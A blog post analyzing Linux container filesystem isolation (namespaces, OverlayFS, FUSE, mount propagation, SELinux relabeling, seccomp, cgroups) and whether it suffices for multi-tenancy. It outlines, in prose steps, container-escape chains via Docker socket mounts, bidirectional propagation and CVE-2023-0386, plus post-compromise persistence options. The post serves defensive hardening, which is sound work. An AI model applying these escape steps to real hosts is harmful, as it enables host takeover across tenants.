Analyzing Container Filesystem Isolation for Multi-Tenant Workloads
12 min read

Analyzing Container Filesystem Isolation for Multi-Tenant Workloads

2449 words

I recently came across an exceptionally dense technical analysis about container security that’s worth sharing. The author started with a simple hypothesis: container filesystem isolation should be sufficient for multi-tenant workloads without virtual machines, if you sufficiently understand what’s happening at the syscall level.

After thorough investigation, the conclusion is more uncomfortable than expected: the defaults protect you well, but the moment you reach for “advanced” features like bidirectional mount propagation or SELinux relabeling, you’re one misconfiguration away from handing an attacker the keys to your host.

Why Filesystem Isolation Matters

The Economics of Multi-Tenancy

Running multiple tenants on shared infrastructure only works if you can guarantee that Tenant A’s compromise can’t touch Tenant B. Linux namespaces provide the foundation; mount namespaces give each container its own view of the filesystem tree. Without this isolation, the cloud economics that make containers attractive fall apart.

Attack Surface Reduction

Containers restrict what a running process can see and do by leveraging kernel namespace features. But “restrict” doesn’t mean “eliminate.” The shared kernel attack surface means a vulnerability in OverlayFS (like CVE-2023-0386) can escalate privileges from inside a container that satisfies the exploit’s preconditions. The kernel is the ultimate shared resource.

The Six Pillars of Filesystem Isolation

1. Mount Namespaces & OverlayFS

Mount namespaces (CLONE_NEWNS) give each container a private view of the mount tree. OverlayFS layers a writable upperdir on top of read-only lowerdir layers, implementing copy-on-write semantics.

The copy-on-write mechanism works like this: when a container modifies a file from a lower layer, the kernel copies it to the upperdir first. All subsequent operations target this copy, leaving the base image untouched.

The shared kernel problem: OverlayFS runs in kernel space. CVE-2023-0386 demonstrated a flaw in how the kernel handles UID/GID mapping validation when copying a capable file from a nosuid mount into another mount during OverlayFS copy-up. This enables local privilege escalation.

2. FUSE (Filesystem in Userspace)

FUSE lets you implement a filesystem as a userspace daemon rather than kernel code. When an application makes a syscall on a FUSE mount, the request travels: VFS → FUSE kernel module → /dev/fuse queue → userspace daemon → response back through the same path.

Why FUSE matters for containers: Kernel overlayfs mounting requires CAP_SYS_ADMIN in the relevant namespace. Where that support isn’t available or reliable, container runtimes like Podman fall back to fuse-overlayfs, which implements overlay semantics in userspace without requiring elevated privileges.

The daemon controls everything: A malicious FUSE daemon can lie about file ownership, permissions, and content. If you mount untrusted FUSE filesystems, access control is theater.

3. Mount Propagation

This is where most of us get burned. Mount propagation determines whether mount events cross namespace boundaries.

The four propagation types are:

  • Shared: Mount events propagate bidirectionally
  • Slave: Events propagate one direction only
  • Private: Events don’t propagate
  • Unbindable: The mount cannot be bind mounted

The kernel’s protection for less-privileged namespaces: When you create a mount namespace that is less privileged than its parent - when the new namespace’s owning user namespace differs from the parent mount namespace’s owner - the kernel automatically demotes inherited shared mounts to MS_SLAVE.

This means creating a mount namespace with a different owning user namespace triggers automatic demotion. Creating one as root (without --user) does not demote - the mount stays shared.

4. MAC Enforcement (AppArmor/SELinux)

Mandatory Access Control (MAC) provides a second layer of defense. Even if a process gains capabilities, MAC policies can deny specific operations.

Docker’s default AppArmor profile (docker-default) denies mount operations except for specific allowed types.

SELinux relabeling (:z and :Z): This is where I found surprising behavior. When you run:

podman run -v /host/path:/container/path:Z myimage

The :Z option instructs the container runtime to relabel /host/path with an MCS label matching the container. This is a recursive relabel of file objects under the mount path - the runtime walks the host filesystem tree and changes the label on each file via libselinux.

This happens before the container starts, on the host. It’s not sandboxed. If you relabel a directory shared by other host services (like /var/log), you break those services. This is a host-side operation masquerading as a container configuration option.

Critical warning: Never use :Z on:

  • Container runtime state directories (/var/lib/docker, /var/lib/containers)
  • Shared system directories (/var/log, /tmp, /var/run)
  • Directories mounted by multiple containers
  • Network filesystems (NFS, CIFS) where relabeling may fail or corrupt remote state

5. Seccomp (The Syscall Gatekeeper)

Here’s something I initially underestimated: for most container deployments, seccomp is the first line of defense against mount-based attacks, not AppArmor or SELinux. Docker and Podman’s default seccomp profiles block the mount syscall entirely for unprivileged containers.

How seccomp filtering works: When a container starts, the runtime installs a BPF (Berkeley Packet Filter) program that intercepts every syscall. The filter examines the syscall number and, optionally, its arguments, then decides: allow, deny (EPERM), kill the process, or trap to userspace.

Docker’s default seccomp profile blocks approximately 44 syscalls by default, including mount, kexec, swapoff, pivot_root, among others.

The practical implication: Even if you somehow grant CAP_SYS_ADMIN to a container (bad idea), the default seccomp profile still blocks mount(). You’d need both the capability and a permissive seccomp profile (or --security-opt seccomp=unconfined) for mount attacks to work.

6. Cgroups v2 and I/O Resource Isolation

Now, this is my other fear when it comes to multi-tenancy; filesystem operations consume shared resources. A container performing unbounded I/O can starve other containers and host services, even with perfect namespace isolation. This isn’t filesystem integrity isolation, it’s filesystem availability isolation.

The problem: By default, most container deployments don’t configure I/O limits. Containers share the host’s I/O capacity without restrictions. A malicious or misbehaving container can saturate disk I/O, causing performance degradation or outages for other containers and host services.

Why this matters for multi-tenancy: Even if your containers are perfectly isolated at the namespace and MAC level, a single container can degrade performance for everyone on the node. In shared clusters, this is a denial-of-service vector that doesn’t require any privilege escalation.

End-to-End Attack Chains

Attack Chain 1: Docker Socket Mount → Full Host Compromise

Scenario: A container has /var/run/docker.sock mounted (common for CI/CD pipelines, monitoring tools, and “Docker-in-Docker” patterns).

Preconditions:

  • Container has access to Docker socket (bind mount)
  • Docker daemon runs as root on host
  • No additional restrictions (this is the default when mounting the socket)

Step-by-step exploitation:

  1. Attacker discovers Docker socket access
  2. Creates privileged container with host filesystem mounted
  3. Reads sensitive host files (/etc/shadow, SSH keys, application secrets)
  4. Chroots into host filesystem and gets a root shell

From here they could:

  • Add SSH keys to /root/.ssh/authorized_keys
  • Create new root users in /etc/passwd
  • Install backdoors or cryptominers
  • Pivot to other systems on the network

Lesson: Never mount the Docker socket into untrusted containers. If you must, use a Docker socket proxy with API filtering.

Attack Chain 2: Bidirectional Mount Propagation → Host Mount Manipulation

Scenario: A container has Bidirectional mount propagation enabled (required for some CSI drivers) and CAP_SYS_ADMIN.

Preconditions:

  • Pod/container has mountPropagation: Bidirectional
  • Container has CAP_SYS_ADMIN (via privileged: true or explicit capability)
  • Seccomp allows mount syscall (disabled by privileged: true)
  • A shared mount exists on the host that the container can see

Step-by-step exploitation:

  1. Attacker creates a bind mount inside the container
  2. The mount propagates to the host
  3. Can shadow legitimate host content by mounting over it

Any host process reading this path sees attacker-controlled content.

Lesson: Bidirectional propagation + CAP_SYS_ADMIN = host mount control. This is why Kubernetes restricts Bidirectional to privileged pods only.

Attack Chain 3: OverlayFS CVE → Kernel Privilege Escalation

Scenario: Exploiting CVE-2023-0386 to escalate from container to host root.

Preconditions:

  • Unpatched kernel (vulnerable OverlayFS)
  • Unprivileged user namespaces enabled
  • Ability to mount OverlayFS in a user namespace
  • Mount topology with nosuid lower layer and non-nosuid upper layer

The actual exploit adds one critical component: FUSE.

  1. Create a FUSE filesystem that lies about file ownership (claims files are owned by UID 0 with SUID bit set)
  2. Use FUSE as the lower layer of an overlay mount inside a user namespace
  3. Trigger copy-up by modifying the fake SUID binary
  4. Vulnerable kernel flaw: during copy-up, the kernel didn’t verify that UID 0 in the user namespace maps to a valid UID on the host
  5. Result: a real root-owned SUID binary appears in the upper directory
  6. Execute the binary → local privilege escalation to root

Lesson: Patch your kernel. This is the only real fix.

Where My Assumptions Failed

I went into this investigation expecting FUSE to be the primary vulnerability vector. User-kernel context switching, daemon-controlled responses, performance overhead - it all screamed “attack surface.”

What I found: FUSE’s weakness is availability (DoS) and cross-user data exposure, not host privilege escalation. A malicious FUSE daemon can hang processes, waste resources, or serve inconsistent data to different users, but it can’t directly escalate privileges to the host.

The actual weakest link is mount propagation misconfiguration. MS_SHARED mode creates a direct, bidirectional channel between container and host mount tables. Unlike FUSE, this isn’t a userspace daemon you can terminate - it’s kernel-enforced behavior that’s easy to enable and hard to notice.

Assumption 2: “SELinux relabeling is sandboxed”

I assumed :z and :Z options were container-side operations, maybe using some capability or namespace trick to relabel files from the container’s perspective.

What I found: Relabeling happens on the host, before the container starts. The container runtime recursively walks the filesystem tree and invokes SELinux relabeling via libselinux.

This means if you mount /var/log:Z into a container, you just relabeled every file in /var/log with a container-specific MCS label. Other host services reading those files may now fail with permission errors.

This isn’t a bug; it’s documented behavior. But it’s surprising if you assume container options stay inside the container.

Assumption 3: “Kernel filesystem bugs are rare”

I knew containers share the kernel, but I assumed mainline filesystem code was battle-tested enough that exploitable bugs were rare.

What I found: CVE-2023-0386 (OverlayFS) exploits the copy-up mechanism. The bug - flawed UID/GID mapping validation during file capability handling - was subtle enough to survive years of production use. CISA added it to their KEV catalog in June 2025, confirming active exploitation two years after the fix was merged.

The shared kernel isn’t a theoretical risk. It’s a practical attack vector with ongoing exploitation.

Alternatives: When Containers Aren’t Enough

The Shared Kernel Problem

The CVE-2023-0386 demonstration illustrates a fundamental constraint: containers share the host kernel, so a kernel vulnerability affects every container simultaneously. No amount of seccomp filtering, capability dropping, or MAC policy can protect against a bug in the kernel’s own filesystem implementation.

This isn’t a configuration problem I can fix. It’s an architectural boundary. The question becomes: what’s the minimum isolation primitive that eliminates this class of vulnerability?

Isolation Boundary Analysis

Each alternative interposes a different boundary between container workloads and the host kernel. The key metric is the Trusted Computing Base (TCB), the set of components that must be correct for isolation to hold.

gVisor takes a fundamentally different approach: instead of filtering syscalls, it reimplements Linux in memory-safe Go. The Sentry component is essentially a userspace kernel, handling syscalls, memory management, filesystems, networking - the works.

This dramatically shrinks the host attack surface. The Sentry needs only 53 host syscalls without networking, 68 with it. Compare that to the ~350 syscalls in Linux 5.3 - that’s an 80% reduction in host kernel exposure.

What I appreciate about the architecture is the defense-in-depth: even the Sentry runs inside seccomp-bpf, namespaces, and cgroups as secondary boundaries. Filesystem operations go through Sentry’s VFS, then to a separate Gofer process that handles host filesystem access via LISAFS.

Firecracker takes the opposite approach: instead of reimplementing the kernel, just give each workload its own kernel. Each microVM runs a real Linux guest, so a host kernel vulnerability requires escaping KVM first - a much harder target.

Kata Containers gives you VM isolation with container UX, but the TCB varies dramatically by hypervisor choice. QEMU has nearly 2 million lines of C with decades of device emulation code - lots of attack surface.

Was My Hypothesis Correct?

My original hypothesis: “Container filesystem isolation is good enough for multi-tenant workloads without VMs, if you understand exactly what’s happening at the syscall level.”

Verdict: Partially correct, with important caveats.

Where the Defaults Hold

For trusted internal workloads, I found the default isolation model works better than I expected. Here’s why:

  1. Seccomp filtering: Docker/Podman block mount() and other dangerous syscalls by default. This is the first line of defense.
  2. Kernel behavior for less-privileged namespaces: When a container runtime creates a user namespace, inherited shared mounts are automatically demoted to slave.
  3. Runtime hardening: Most container runtimes (runc, crun, containerd) explicitly apply MS_REC|MS_SLAVE to the container’s root early in setup.
  4. MAC policies: AppArmor/SELinux provide defense-in-depth even if other layers fail.

Together, these layers mean that out-of-the-box containers from Docker, Podman, or Kubernetes have reasonable filesystem isolation without special configuration.

Where It Breaks

For untrusted multi-tenant workloads (running other people’s code), I found gaps that can’t be configured away:

  1. Kernel bugs are game over: A single OverlayFS vulnerability can grant root to any container that satisfies the exploit’s preconditions.
  2. Configuration complexity creates risk: MS_SHARED propagation, host path mounts, privileged containers - each “advanced” feature punches holes in isolation.
  3. MAC depends on runtime integrity: CVE-2023-28642 showed that path resolution bugs in runc can bypass AppArmor.
  4. Resource isolation is opt-in: Cgroup I/O limits, storage quotas, and PID limits aren’t enabled by default.
  5. Production drifts from defaults: Teams add privileged: true to “make things work,” mount Docker sockets for CI/CD, and accumulate dangerous configurations over time.

Final Thoughts

Container filesystem isolation isn’t a wall - it’s an interlocking set of kernel mechanisms that work together to create a security boundary. Seccomp filters, capabilities, mount namespaces, OverlayFS, propagation rules, MAC policies, and cgroup resource limits - each contributes a piece.

The defaults work better than I initially expected. Seccomp blocking mount() out of the box means most mount-based attacks fail before they start. The kernel’s shared→slave demotion for less-privileged namespaces, combined with runtime hardening, provides meaningful protection.

But the power to break isolation lives in configuration options that promise convenience. Bidirectional mount propagation, host path SELinux relabeling, privileged containers, Docker socket mounts - these are documented features, not bugs. They work exactly as designed. The problem is that their design trades isolation for functionality, and production environments accumulate these trades over time.

The line between secure multi-tenancy and a compromised host is drawn where you choose to override defaults. And if you’re running truly untrusted code, consider whether containers are the right abstraction at all.

gVisor, Firecracker, and Kata exist because sometimes the answer to “is container isolation enough?” is simply “no.”

Comments

Latest Posts

4 min

687 words

A few days ago, working with Claude Code, I came across a tool that’s been around in the Docker ecosystem for a while but that I didn’t know about: docker pushrm. And the truth is it surprised me how useful it is for something as simple as keeping your container repository documentation synchronized.

The problem it solves

Anyone who has worked with Docker Hub, Quay, or Harbor knows the typical flow: you update your project’s README on GitHub, build and push your image, but… the container registry’s README is still outdated. You have to manually go to the browser, copy and paste the content, and do the update manually.

5 min

952 words

Vercel has announced the general availability of Vercel Sandbox, an execution layer designed specifically for AI agents. But beyond the AI agent hype, there’s an interesting question: can it be useful for running code safely in different languages like PHP, Node, or Go?

What is Vercel Sandbox?

Vercel Sandbox provides on-demand Linux microVMs. Each sandbox is isolated, with its own filesystem, network, and process space. You get sudo access, package managers, and the ability to run the same commands you’d run on a Linux machine.

8 min

1546 words

The Problem We All Have (But Solve Poorly)

As a DevOps Manager, I spend more time than I should configuring ways for the team to show their development work. Client demos, webhooks for testing, temporary APIs for integrations… we always need to expose localhost to the world.

Traditional options are a pain:

  • ngrok: Works, but ugly URLs, limits on free plan, and every restart generates a new URL
  • localtunnel: Unstable, URLs that expire, and often blocked by corporate firewalls
  • SSH tunneling: Requires your own servers, manual configuration, and networking knowledge
  • Manual Cloudflare Tunnels: Powerful but… God, the manual configuration is hellish

And then I discovered Moley.

2 min

227 words

When installing/renewing let’s encrypt on a web server with nginx, we have to decide whether to do it with a temporary server, which means we must temporarily stop the web service, or indicate what the DocumentRoot of the web server is for the domain.

The latter implies that the website or service has a “public” DocumentRoot, and that’s not always easy when we’re using, for example, a Python, Java, or Go application and nginx as a proxy.